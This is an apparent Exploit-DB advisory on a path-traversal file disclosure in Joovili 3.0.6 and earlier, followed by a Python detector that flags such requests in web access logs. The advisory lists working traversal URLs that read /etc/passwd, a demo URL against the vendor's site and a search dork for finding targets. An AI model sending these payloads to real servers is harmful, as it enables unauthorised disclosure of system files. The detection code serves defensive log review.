Joovili <= 3.0.6 joovili.images.php Remote File Disclosure Vulnerability

2007-12-27T00:00:00
ID EDB-ID:4799
Type exploitdb
Reporter EcHoLL
Modified 2007-12-27T00:00:00

Description

Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability. CVE-2007-6620, CVE-2007-6621. Webapps exploit for the PHP platform.

found by EcHoLL
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
 
version 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
 
 
demo
http://demo.joovili.com/include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
dork: powered by joovili

# milw0rm.com [2007-12-27]
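
For log review, the requests listed above share one trait: the `picture` parameter of `include/images.inc.php` or `joovili.images.php` carries `..` path segments. The following detection sketch is an added example, not part of the original advisory or of Joovili's code. It assumes combined-format access logs, uses constructed sample lines, and goes beyond the listed strings by also decoding percent-encoded variants.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script names taken from the advisory (2.x and 3.x layouts).
SCRIPTS = ("include/images.inc.php", "joovili.images.php")
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode several times so double-encoded input is normalised too."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def is_traversal(picture):
    """True if the picture value would leave the image directory."""
    path = fully_decode(picture).replace("\\", "/")
    segments = [s for s in path.split("/") if s]  # collapses the '//' runs
    return path.startswith("/") or "\x00" in path or ".." in segments

def suspicious_picture(target):
    """Return the offending picture value for a request target, else None."""
    url = urlsplit(target)
    if not url.path.endswith(SCRIPTS):
        return None
    for value in parse_qs(url.query, keep_blank_values=True).get("picture", []):
        if is_traversal(value):
            return value
    return None

def scan(lines):
    """Return (client, picture) for each access-log line that matches."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m and (value := suspicious_picture(m.group(2))) is not None:
            hits.append((m.group(1), value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Dec/2007:10:00:01 +0000] "GET /joovili.images.php?picture=uploads/42.jpg&thumbnail=FALSE HTTP/1.1" 200 5120',
    '198.51.100.7 - - [27/Dec/2007:10:00:05 +0000] "GET /joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE HTTP/1.1" 200 1432',
    '198.51.100.7 - - [27/Dec/2007:10:00:09 +0000] "GET /include/images.inc.php?picture=%252e%252e%252f%252e%252e%252fetc%252fpasswd&thumbnail=FALSE HTTP/1.1" 200 1432',
    '203.0.113.4 - - [27/Dec/2007:10:00:12 +0000] "GET /index.php?picture=../x HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(client, value)
```

A hit with a 200 status and a response size unlike a normal image is the case to investigate first; the same `is_traversal` check also serves as a request filter in front of the affected scripts.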